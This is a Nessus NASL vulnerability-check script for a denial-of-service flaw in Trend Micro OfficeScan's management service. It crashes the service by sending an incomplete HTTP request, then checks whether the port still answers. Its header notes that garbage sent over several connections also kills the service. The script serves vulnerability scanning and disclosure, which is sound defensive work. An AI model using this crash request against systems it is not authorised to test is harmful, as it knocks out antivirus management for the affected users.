#
# This script was written by Michel Arboi <arboi@bigfoot.com>
#
# Script audit and contributions from Carmichael Security <http://www.carmichaelsecurity.com>
#      Erik Anderson <eanders@carmichaelsecurity.com>
#      Added BugtraqID and CVE
#
# GPL
#
# Status: untested
#
# References: 
#
# Date:  Mon, 17 Jul 2000 22:25:37 +0200
# From: "Marc Ruef" <marc.ruef@computec.ch>
# To: submissions@packetstormsecurity.org, news@securiteam.com, 
#   bugtraq@securityfocus.com, ivan.schmid@astalavista.ch, jp@antionline.com
# Subject: Trend Micro Officescan Denial of Service
#
# http://online.securityfocus.com/bid/1013
#
# TBD:
# Sending garbage may also kill the service or make it eat 100% CPU
# Opening 5 connections while sending garbage will kill it


if(description)
{
 script_id(11059);
 script_version("$Revision: 1.3.2.1 $");
 script_cve_id("CAN-2000-0203");
 script_bugtraq_id(1013);
 script_name(english:"Trend Micro OfficeScan Denial of service");
 
 desc["english"] = "
It was possible to kill the Trend Micro OfficeScan 
antivirus management service by sending an incomplete 
HTTP request.

Solution : upgrade your software

Risk factor : Medium";

 desc["francais"] = "
Il a t possible de tuer le service d'administration
OfficeScan de Trend Micro en lui envoyant une requte
HTTP incomplte.

Solution : mettez  jour votre logiciel.

Facteur de risque : Moyen";

 script_description(english:desc["english"], francais:desc["francais"]);
 
 summary["english"] = "Crashes OfficeScan";
 summary["francais"] = "Tue OfficeScan";
 script_summary(english:summary["english"], francais:summary["francais"]);
 
 script_category(ACT_DENIAL);
 
 script_copyright(english: "This script is Copyright (C) 2002 Michel Arboi");
 family["english"] = "Denial of Service";
 family["francais"] = "Dni de service";
 script_family(english:family["english"], francais:family["francais"]);
 script_dependencies("find_service.nes");
 script_require_ports("Services/www", 12345);
 exit(0);
}

# The script code starts here

if (safe_checks()) exit(0);

attack = string("get /  \r\n");

port = get_kb_item("Services/www");
if(!port)port = 12345;
if(!get_port_state(port)) exit(0);

soc = open_sock_tcp(port);
if(!soc) exit(0);

send(socket:soc, data: attack);
sleep(1);
close(soc);

soc = open_sock_tcp(port);
if(!soc) security_hole(port);
